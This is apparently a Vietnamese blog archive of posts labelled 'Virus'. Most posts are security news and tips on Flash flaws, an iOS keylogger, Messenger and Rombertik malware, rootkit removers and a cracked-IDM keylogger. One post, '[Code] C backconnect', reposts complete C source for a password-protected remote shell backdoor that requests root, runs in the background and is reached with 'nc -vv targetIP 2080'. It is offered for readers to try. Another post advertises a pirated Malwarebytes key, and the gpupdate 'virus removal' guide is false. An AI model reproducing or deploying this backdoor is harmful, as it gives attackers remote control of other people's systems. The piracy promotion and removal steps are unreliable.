Hiển thị các bài đăng có nhãn Virus. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Virus. Hiển thị tất cả bài đăng

Thứ Hai, 9 tháng 4, 2018

Malwarebytes Premium 3.4.5 cd key License Liftime

Malwarebytes Premium 3.4.5 là phần mềm chống gián điệp, bảo vệ máy tính của bạn khỏi virus quảng cáo … Anti-malware, Anti-Spyware, Anti-Rootkit … Bảo vệ máy tính khỏi Ransomware


Malwarebytes Premium bảo vệ máy tính khỏi các mối nguy hiểm
Phát hiện và loại bỏ phần mềm độc hại trong thời gian thực với công nghệ chống lại phần mềm độc hại, chống phần mềm gián điệp và chống rootkit tiên tiến. Quét các mối đe dọa tự động bằng cách sử dụng trí tuệ nhân tạo (AI) để bạn được bảo vệ mà không cần phải lo nghĩ đến máy tính bị nhiễm virus.

Bảo vệ dữ liệu của bạn an toàn khỏi virus đòi tiền chuộc
Liên tục cập nhật các bản vá mới nhất các mẫu virus tống tiền giúp máy tính của bạn an toàn khỏi chúng. Đây là một sự bảo vệ mạnh mẽ, toàn diện ngăn chặn ransomware, chứ không phải là một công cụ giải mã đơn giản. Vì vậy, bạn đã được bảo vệ khỏi virus “Ransomware Attack!” Ngay hôm nay và tương lai

Ngăn chặn sự tấn công qua các lỗ hổng phần mềm của bên thứ 3 như trình duyệt web …
Bao gồm trình duyệt và các chương trình phần mềm của bạn trong bốn lớp phòng vệ, ngăn chặn các cuộc tấn công sử dụng các lỗ hổng trong các chương trình đó để xâm nhập vào máy tính của bạn.

Bảo vệ bạn khỏi các trang web giả mạo và virus
Phát hiện và ngăn chặn sự tiếp xúc với các trang web giả mạo và liên kết độc hại. Bạn được bảo vệ chủ động trước khi tải xuống phần mềm độc hại, các nỗ lực xâm nhập và quảng cáo bị nhiễm. Từ nay sẽ không lo lắng khi lướt web xem phim nữa nhé ^_^

Quét nhanh hơn, quét thông minh hơn
Chế độ Siêu quét tốc độ cao chỉ nhắm mục tiêu đến các mối đe dọa đang hoạt động. Phân tích nhanh hơn. Vẫn nhận được kết quả. Chạy quét dưới nền trong khi bạn khởi động trò chơi yêu thích của bạn. Nó được thực hiện bởi thời gian thực khi bạn đang chơi game hoặc giải trí

MALWAREBYTES + KEY

Video hướng dẫn cài đặt Malwarebytes Premium 3.4.5


Nguồn : Share Là Chuẩn

Chủ Nhật, 25 tháng 6, 2017

Hướng dẫn xử lý nhanh khi bị Facebook bắt quét virus

Mấy tuần nay tự dưng tớ bị Facebook bắt quét virus liên tục. Trong nhóm J2TEAM Community cũng thấy có mấy bạn đăng bài hỏi. Gặp nhiều nên có kinh nghiệm, bài này tớ đăng lên để chia sẻ mẹo mà tớ thường làm để có thể xử lý nhanh khi gặp vụ này.

Với hướng dẫn trong bài viết này, thay vì phải chờ đợi lâu thì bạn có thể đăng nhập trở lại Facebook trong vòng một phút. Hi vọng sẽ giúp được nhiều bạn!

Làm gì khi bị Facebook bắt quét virus?

Khi đang dùng Facebook mà bỗng dưng bị đăng xuất, đăng nhập lại thì thấy cái thông báo như thế này:


Các bạn nhấn vào Continue, Facebook sẽ yêu cầu tải một scanner của hãng AV nào đó trong danh sách sau:

  • Kaspersky
  • ESET
  • TrendMicro
  • F-Secure

Đây là những đối tác của Facebook nhé! Trong trường hợp của mình thì là ESET.


Các bạn nhấn nút Download. Sau khi tải xong thì mở file đó lên, lúc này bạn sẽ không thấy có chương trình nào hiện lên cả vì nó chạy ngầm. Sử dụng các công cụ quản lý tiến trình (như Process Explorer) sẽ thấy.

Lưu ý, tới đây là đoạn quan trọng nhất của bài viết. Thông thường thì nhiều bạn sẽ phải chờ cho tới khi cái scanner kia chạy xong mới có thể đăng nhập trở lại Facebook, mà thời gian nó quét thì khá là lâu (có khi lên tới vài tiếng đồng hồ).

Dù bạn có mở Facebook bao nhiêu lần thì nó cũng sẽ chuyển hướng bạn tới cái bước 2 ở trên để tải scanner. Thay vào đó, hãy mở trang nào đó không phải trang chủ Facebook, ví dụ mình hay vào Settings. Facebook sẽ yêu cầu bạn đăng nhập để truy cập trang này. Khi đăng nhập vào thì nó sẽ hiện như này:


Nhấn vô Continue to Facebook, thế là bạn đã đăng nhập được vào Facebook mà không cần chờ scanner quét xong.

Nguồn : Junookyo Blog's

Thứ Bảy, 24 tháng 6, 2017

Hiểm hoạ từ ứng dụng Flash

Do tính thông dụng của Flash nên ứng dụng này thường trở thành mục tiêu tấn công của hacker. Các nền tảng máy tính thông dụng như Windows, Mac… đều có thể bị tấn công thông qua lỗ hổng bảo mật của ứng dụng Flash.
Nhằm vào Firefox!



Trình duyệt Firefox đã trở thành nạn nhân chủ yếu của những đợt tấn công vào ứng dụng Flash trong năm 2013. Hầu hết các cuộc tấn công được Adobe ghi nhận lại trong tháng 2/2013 đều nhằm vào Firefox.

Ngay trong tháng 2/2013, Adobe đã phải tung ra 3 bản vá bảo mật để “bịt lỗ hổng” của Flash Player. Ngay lập tức Microsoft và Google cũng đưa ra phiên bản mới của trình duyệt Internet Explorer và Chrome để cập nhật bản vá này.

Các lỗ hổng bảo mật này khi được nhúng vào Flash sẽ dẫn người dùng máy tính đến các trang web có chứa mã độc. Sau khi bị nhiễm mã độc, máy tính có thể dẫn đến tình trạng treo máy, bị chiếm quyền điều khiển, thay đổi cấu hình hệ thống…

Bản thân Mozilla cũng cảnh báo người dùng và đưa ra công cụ mới “Click-to-Play” cho trình duyệt Firefox. Những người dùng Firefox sẽ phải nhấn chuột để xác nhận các plug-in mà trang web cần đến. Nếu công cụ này chưa hoạt động, người dùng có thể tự kích hoạt nó trong mục cấu hình Firefox (about:config).



Dựa trên công cụ này, các plug-in thông dụng như Microsoft Silverlight, Java, Adobe Reader… sẽ bị Firefox chặn và yêu cầu cập nhật bản mới nhất. Nếu trình duyệt chưa được cập nhật, bạn sẽ không thể nghe nhạc hoặc xem video trực tuyến. Sau khi cập nhật phiên bản mới nhất thì trình duyệt sẽ hoạt động trở lại bình thường.

Hiện tại, phiên bản Adobe Flash 10.2 trở xuống đã bị chặn và liên tục yêu cầu cập nhật phiên bản mới. Tuy nhiên, đối với trình duyệt Firefox đã cập nhật phiên bản Adobe Flash sẽ không bị ảnh hưởng bởi công cụ này.

Vá khẩn cấp

Từ đầu năm 2013, Adobe và Microsoft phải tung ra bản vá khẩn cấp để ngăn ngừa các đợt tấn công của hacker nhằm vào lỗ hổng bảo mật của ứng dụng Flash Player. Đã xuất hiện hai lỗ hổng bảo mật của các phiên bản Flash Player trên các hệ điều hành Windows, Mac và Linux.


Trong khi đó, Apple lại quyết liệt hơn khi cập nhật bản vá chặn ứng dụng Flash trên trình duyệt Safari (dùng trên MacOS). Các trình duyệt trên máy Mac chưa được cài bản vá bảo mật về Flash sẽ bị chặn với thông điệp “Adobe Flash out of date”. Sau khi cập nhật bản vá chính thức từ Apple, máy Mac mới sử dụng Flash trở lại bình thường.

Đầu tháng 2/2013, Oracle cũng vừa tung ra bản vá bảo mật cho phiên bản Java 7. Bản vá này dành cho phiên bản Windows 32 bit và 64 bit lẫn các hệ điều hành MacOS và Linux.

Lỗ hổng này liên quan đến các plug-in (phần mềm hỗ trợ) trên các trình duyệt phổ biến như Internet Explorer, Firefox… Thông qua lỗ hổng của ứng dụng Java, các hacker có thể khởi động mã độc, điều khiển máy tính từ xa…

Microsoft cũng đề nghị người dùng cài đặt chế độ Local Intranet trên trình duyệt IE lên mức cao (High) nhằm chống lại hoạt động xâm nhập của hacker. Đồng thời, tải bộ công cụ Enhanced Mitigation Experience Toolkit (Microsoft) về máy tính nhằm ngăn chặn việc khai thác các lỗ hổng bảo mật.

Một số biện pháp phòng chống máy tính nhiễm mã độc
+ Tắt ứng dụng Flash và Java script trên phần mềm Acrobat.
+ Hạn chế mở các tập tin Excel và PDF (nếu có nghi vấn).
+ Cập nhật các bản vá mới nhất cho trình duyệt web.
+ Dùng một số công cụ quét lỗ hổng bảo mật để kiểm tra.
+ Mã hóa các dữ liệu quan trọng trên máy tính.
Lây nhiễm từ ứng dụng

Trong số các ứng dụng dễ bị tấn công trên môi trường Internet có Adobe Flash và Adobe Reader/Acrobat. Đặc biệt là ứng dụng Adobe Reader chưa kiểm soát và ngăn chặn được mã độc nhúng trong các tập tin PDF.

Một lỗ hổng zero-day đối với ứng dụng Adobe Reader/Acrobat cũng vừa được phát hiện trong tháng 2/2013. Các hãng bảo mật khuyên người dùng cẩn thận khi mở các tập tin PDF và nếu có thể thì nên đọc bản PDF ngay trên trình duyệt.

Lỗ hổng bảo mật trên các phần mềm Reader và Acrobat sẽ tạo điều kiện cho hacker tấn công và chiếm quyền điều khiển máy tính từ xa.
Các lỗ hổng bảo mật trên trình duyệt web cũng là một mục tiêu tấn công của tội phạm mạng. Trung tâm Ứng cứu khẩn cấp sự cố máy tính Việt Nam (VNCert) vẫn thường xuyên cảnh báo người dùng máy tính về lỗ hổng bảo mật trên trình duyệt.

Đã có một thời gian khá dài, hacker liên tục xâm nhập vào máy tính sử dụng trình duyệt phiên bản cũ Internet Explorer 6 – 8. Hiện tại, phiên bản Internet Explorer 10 trên Windows 8 có mức độ bảo mật cao hơn các phiên bản cũ.

Không những lơ là trong việc cập nhật các bản vá bảo mật mới, một số tổ chức/công ty còn sử dụng phần mềm không có bản quyền nên không thể cập nhật bản vá mới. Đây chính là những sơ hở “chết người” tạo điều kiện cho các cuộc tấn công trên mạng.

Gần đây, một số ứng dụng xem TV/phim hoặc nghe nhạc Online trên máy tính thường yêu cầu cài đặt thêm một số ứng dụng đính kèm. Theo các chuyên gia bảo mật thì người dùng cần cảnh giác trước yêu cầu này. Có khả năng, các ứng dụng này bị nhúng virus do thám (spyware) dùng để lây nhiễm mã độc, đánh cắp thông tin cá nhân…

Chủ Nhật, 30 tháng 10, 2016

New Apple vulnerability allows Malicious keylogger App to Record User Inputs


Yet another Apple vulnerability has been exposed by security researchers, that can be exploited to track your finger's every action on iOS Devices i.e. iPhone, iPad etc. The exploit reportedly targets a flaw in iOS multitasking capabilities to capture user inputs, according to Security researchers at FireEye. They found a way to bypass the Apple's app review process effectively and created a proof-of-concept Monitoring app for non-jailbroken iOS 7.0.x devices. The “monitoring” app, that runs in the background of the iPhone is a Keylogger Trojan which could allow hackers to monitor user's activities on the mobile device, including - touches on the screen, home button press, volume button press and TouchID press, and send all collected events to any remote server.
 

According to researchers, their proof-of-concept app works on versions 7.0.4, 7.0.5, 7.0.6, and 6.1.x.
"Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring." FireEye researchers said.
In iOS devices, the application running in the background keeps on refreshing itself; but the
researchers also noted that disabling iOS 7's "Background App Refresh" setting would not restrict a malicious app from keylogging. "For example, an app can play music in the background without turning on its "background app refresh" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring." FireEye explained, So the only present solution to the problem is to manually remove apps from the task switcher. Earlier this week, Apple has issued an urgent update iOS 7.0.6 in response to a SSL vulnerability that might allow hackers to bypass SSL/TLS verifications on shared and public networks and steal users information from affected devices, including log-in usernames and passwords, as well as other sensitive information. The Security firm is actively working with Apple on the issue, but until the release of next iOS update, the only thing iOS users can do - Check and monitor the unnecessary applications running on the device via Task Manager and KILL THEM. Last month, Trustwave's Neal Hindocha also demonstrated that even Smartphone screen swipe gestures can be analyzed by hackers and as a proof-of-concept he developed a prototype 'Screenlogging' malware for the iOS and Android Smartphones that works the same as a keylogger software for desktop.

[Code] C backconnect


Hôm nay tình cờ ghé vào blog "https://bloghackerword.blogspot.com" thấy bài này code cũng khá ok nên mình leech về cho anh em xài thữ :D Hiện tại code này mình chưa viết ra ứng dụng nhé :D vì mình không chuyên về C nên cũng khá khó :D có gì anh em thông cảm cho mình với nhé :D

#include 
#include
#include
#include
#include
#include
#include

#define ENTERPASS "Nhap mat khau: \0"
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
#define PASSWORD "ceh.vn"
int main(int argc, char **argv)
{
struct sockaddr_in c_addr;
struct sockaddr_in s_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;

setuid(0);
setgid(0);
seteuid(0);
setegid(0);

if (argc!=2){
printf("=================================\r\n");
printf("|bin.c by pr0cess edit by kai\r\n");
printf("|Usage:\r\n");
printf("|./cehbin 2080\r\n");
printf("|nc -vv targetIP 2080\r\n");
printf("|Nhap mat khau\r\n");
printf("|Chuc may man ;)\r\n");
printf("=================================\r\n");
exit(1);

}
if (fork()){
exit(0);
}

sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);

if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}

write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{

exit(1);
}
}

close(sock_descriptor);
return 0;
}

Thứ Tư, 26 tháng 10, 2016

TOP 5 Phần Mềm Tiêu Diệt Mã Độc Rootkit Cho Windows

Rootkit là một dạng phần mềm độc hại (malware) được xây dựng với mục tiêu chủ yếu là để ẩn giấu các đoạn mã độc có khả năng gây nguy hiểm đến máy tính của chúng ta. Một khi đã được cài đặt, rootkit sẽ “ngụy trang” bản thân sao cho các phần mềm diệt virus thông thường khi quét qua chỉ thấy nó một là một ứng dụng vô hại.


Thường thì rootkit càng tồn tại lâu trong một chiếc máy thì nó càng gây nhiều ảnh hưởng nghiêm trọng tới tính bảo mật của thiết bị cũng như đến độ an toàn thông tin của người dùng. Ngoài ra, rootkit còn trở nên nguy hiểm hơn khi nó giấu thêm một malware nào đó, và đây là cách tấn công thường được các tin tặc tận dụng.

Malwarebytes AntiRootkit


Là phần mềm bảo mật có khả năng phát hiện được những phần mềm Rootkit nguy hiểm nhất hiện nay. Phần mềm này có cách thức làm việc khá “sạch sẽ”, sau khi phát hiện và loại bỏ Rootkit ra khỏi Windows, nó còn tiến hành kiểm tra, sửa lỗi và khôi phục hoạt động của Internet Access, Windows Firewall, và Windows Update. Nhằm đảm bảo rằng Windows sẽ hoạt động ổn định trở lại sau khi xong việc.

BitDefender Rootkit Remover


Bitdefender Rootkit Remover là một tiện ích nhỏ gọn đến từ Bitdefender Labs cho phép bạn loại bỏ rootkit chỉ với một cú nhấp chuột. Chương trình có thể loại bỏ các mối đe dọa rootkit, bao gồm Mebroot, gia đình TDL (TDL/SST/Pihar), Mayachok, Mybios, Plite, XPaj, Whistler, Alipop, CPD, Fengd, FIPS, Guntior, MBR Locker, Mebratix, Niwa, Ponreb, Ramnit, Stoned, Yoddos, Yurn, Zegost và Necurs.

Bitdefender Rootkit Remover sẽ không yêu cầu quá nhiều cài đặt phức tạp hoặc khó hiểu, nó là công cụ di động có thể chạy trực tiếp thông qua tập tin thực thi tải về. Giao diện người dùng cũng khá đơn giản và nhỏ gọn, hỗ trợ duy trì cho người dùng một cảm giác tốt đẹp nhất.

McAfee Rootkit Remover

Là sản phẩm “chính hãng” của McAfee, McAfee Rootkit Remover có thể phát hiện và tiêu diệt nhanh gia đình Rootkit ZeroAccess và TDSS.


Sau khi tải về, bạn có thể sử dụng ngay McAfee Rootkit Remover mà không cần cài đặt. Người dùng sẽ được McAfee Rootkit Remover hướng dẫn trải qua 3 bước làm việc trong môi trường dòng lệnh và sử dụng Command Prompt để tiến hành phát hiện và loại bỏ Rootkit.

Kaspersky TDSSkiller

TDSSkiller là ứng dụng được phát hành bởi Kaspersky, mục đích nhầm hỗ trợ cho người dùng sử dụng phần mềm bảo mật Kaspersky Antivirus của hãng. Kaspersky TDSSkiller sẽ tiến hành dò tìm và tiêu diệt rootkit và bootkit trên Windows mỗi khi được kích hoạt sử dụng. Phần mềm này có giao diện bắt mắt, và dễ sử dụng.


Tốc độ quét của Kaspersky TDSSkiller khá nhanh, thông thường sẽ hoàn thành việc quét hệ thống chỉ trong vào giây.

Sophos Rootkit Removal

Có thể xem Sophos Rootkit Removal là một phần mềm chuyên phát hiện và tiêu diệt Rootkit chuyên nghiệp. Nó có thể nhận biết và tiêu diệt hầu hết các loại Rootkit, phần mềm độc hại và mã độc hiện nay do được trang bị một loạt các công cụ kèm theo để làm việc.


Một điểm khá tuyệt khác của Sophos Rootkit Removal là nó có thể kết hợp với các chương trình antivirus khác trên máy để làm thành một rào chắn an toàn cho Windows.

Lời kết
Do Rootkit có thể giả dạng các phần mềm phổ biến hiện nay để dễ dàng xâm nhập vào máy tính của bạn. Vì thế, ngoại trừ việc luôn luôn tải các phần mềm tiện ích ở ngay trang chủ của phần mềm và các nguồn cung cấp tin cậy, bạn cũng nên thường xuyên kích hoạt và tiến hành quét máy tính bằng các công cụ Anti-Rootkit để nhanh chóng phát hiện và loại bỏ sớm để tránh gây ảnh hưởng đến hệ thống.

Virus mới lại lây lan qua Facebook Messenger


Những ngày cuối tuần, nhiều người sử dụng Facebook tại Việt Nam nhận được lời mời xem video qua tin nhắn Messenger.
Điểm đặc biệt là ảnh đại diện (thumbnail) của video chính là avatar của người nhận được đường link kèm câu hỏi: “Video này là của bạn à?”. Do đó, không ít người đã tưởng rằng đoạn video đó nói về họ và vội vàng bấm vào xem.

Ngay khi click vào đường dẫn, trình duyệt của người dùng sẽ bị chuyển hướng sang một trang web có giao diện giống Facebook và yêu cầu họ cài phần mềm plug-in nếu muốn xem video. Tuy nhiên, chuyên gia Nguyễn Minh Đức thuộc Ban Công nghệ – Tập đoàn FPT cho biết nếu chấp nhận cài, mọi hoạt động truy cập web của người sử dụng sẽ bị kẻ xấu kiểm soát chứ không riêng Facebook.

Trang web có giao diện giống Facebook yêu cầu người dùng cài thêm plug-in, nhưng địa chỉ tên miền không phải Facebook.com.
Sau khi lây nhiễm vào máy, virus sẽ tiếp tục tự động gửi tin nhắn đến những người khác trong danh sách bạn bè của nạn nhân qua Messenger.

Ông Đức cho biết, để tránh nhiễm virus, mọi người tốt nhất không bấm vào đường link lạ (địa chỉ tên miền lạ, cách nói chuyện khác thường của người gửi link..).

Trong tình huống vô tình bấm vào những trang có yêu cầu nhập mật khẩu hay cài thêm plug-in thì nên lập tức thoát ra. Còn nếu thiết bị đã bị nhiễm virus, người sử dụng cần gỡ bỏ plug-in trên trình duyệt hoặc cài phần mềm diệt virus để quét toàn bộ hệ thống.

Mọi người nên đề phòng nhé @@

Thứ Tư, 22 tháng 6, 2016

Lộ diện biến thể virus máy tính mới có thể tự hủy khi bị phát hiện

Biến thể virus mới đây được các nhà nghiên cứu của hãng bảo mật Cisco phát hiện có khả năng tự hủy để tránh bị "tóm gọn" sau khi các ứng dụng phân tích virus phát hiện ra chúng.


Theo các nhà nghiên cứu bảo mật tại Cisco, một loại phần mềm độc hại mới có tên Rombertik vừa bị phát hiện cho thấy chúng có thể tự phá hủy những dữ liệu quan trọng lưu trữ trong tệp tin hệ thống Windows trên Master Boot Record (một thành phần quan trọng của ổ cứng và là nơi lưu trữ thông tin phân vùng ổ đĩa), khiến máy tự khởi động lại nhiều lần nhằm trốn sự phát hiện của các công cụ phân tích virus, phần mềm độc hại. Cùng với đó, khi Master Boot Record bị lỗi sẽ khiến khả năng phục hồi dữ liệu trên ổ cứng trở nên khó khăn hơn bao giờ hết.
Master Boot Record bắt đầu với đoạn mã thực thi trước khi hệ điều hành được khởi động. Khi Master Boot Record bị Rombertik ghi đè lên, nó sẽ hiển thị lệnh "Carbon crack attempt, failed" và sau đó đưa người dùng vào một vòng lặp vô hạn để ngăn cản hệ thống tiếp tục khởi động đúng quy trình.


Dù người dùng có khởi động lại bao nhiêu lần thì màn hình vẫn hiển thị dòng chữ trên cho tới khi máy tính được cài đặt lại hệ điều hành.


Loại phần mềm độc hại mới này cũng có thể đánh lừa được cả các công cụ sandbox (cô lập ứng dụng) của các nhà nghiên cứu bằng cách viết ra một byte dữ liệu ngẫu nhiên và chuyển tới bộ nhớ hệ thống hơn 960 triệu lần liên tục.

Chuyên gia bảo mật Graham Cluley cho biết, loại phần mềm tự hủy như Rombertik là khá hiếm bởi vì phần mềm độc hại hiện nay không bao giờ muốn gây sự chú ý bởi mục tiêu chính của chúng là âm thầm "trộm" đi những thông tin quý giá của người dùng trong thời gian dài.
Rombertik được Cisco xác định có thể sẽ xuất hiện khá nhiều thông qua thư rác và tin nhắn lừa đảo được gửi đến nạn nhân, dụ dỗ người dùng tải về và giải nén các file đính kèm chứa mã độc.
Một khi được cài đặt và lây lan trên máy tính của người dùng, phần mềm độc hại Rombertik sẽ đánh cắp thông tin đăng nhập và dữ liệu cá nhân của người dùng khi truy cập vào bất kỳ website nào trước khi gửi dữ liệu này tới kẻ tấn công.

Diệt virus, trojan trên Windows 7 không cần tải phần mềm

Mọi loại virus trên máy tính sẽ bị tiêu diệt hoàn toàn mà không cần cài đặt phần mềm.



Đa phần máy tính nào cũng sử dụng những loại phần mềm để phát hiện, tiêu diệt những chương trình virus độc hại. Tuy nhiên, thời gian chờ đợi hoàn thành quá trình diệt virus không hề nhanh, thậm chí một số chương trình sẽ khiến tốc độ chạy của máy chậm lại. Trong bài viết dưới đây, chúng tôi sẽ giới thiệu đến bạn cách diệt virus, trojan trên Windows 7 bằng tay rất nhanh mà lại hiệu quả không kém phần mềm.

Bước 1:
Nhấn tổ hợp phím Win + R xuất hiện cửa sổ Run, nhập lệnh gpedit.msc và nhấn Ok.



Bước 2:
Trong cửa sổ Loacal Group Policy Editor, kích chọn Computer Configuration tiếp tục nhấn
Administrative và chọn Templates Sytems.



Bước 3:
Tại phần Setting, nhấn chuột phải vào Removable Disks: Deny Execute access, chọn Edit.



Bước 4:
Xuất hiện hộp thoại Removable Disk: Deny execute access, tích chọn Enabled nhấn Ok và Apply để hoàn thành công đoạn thiết lập.



Bước 5:
Tại cửa sổ Run, gõ cmd và nhấn Ok.


Bước 6:
Gõ lệnh gpupdate /force để hệ thống tìm kiếm virus, trojan có trên máy tính.



Vậy là chúng ta đã hoàn thành xong công đoạn diệt virus bằng tay. Người dùng cần lưu ý, quá trình diệt này không thích hợp với USB, đĩa mềm. Kiểm tra các file trước khi copy vào máy tính vì nó chỉ có tác dụng dụng với loại virus lây lan trong máy tính. Trong quá trình diệt virus bằng tay, các thiết bị lưu trữ ngoài sẽ ngừng hoạt động.


Thứ Hai, 23 tháng 5, 2016

[Waring] IDM Silent không cần crack - Virus


[Cảnh báo] các bản IDM Silient, không cần Crack. Các bạn lập tức xóa ngay file C:\Windows\System32\IDMSL Auto Update.exe Đây là một keylogger. Các chương trình Antivirus vẫn chưa phát hiện được ra. Không dùng các bản Crack IDM như vậy.
Remove File IDMSL Auto Update.exe

Trích
P/S: Thằng code ra con đấy, tao vừa vào xóa vài thứ của mày rồi, lập Email khác mà cập nhất các bản mới nhá hô hô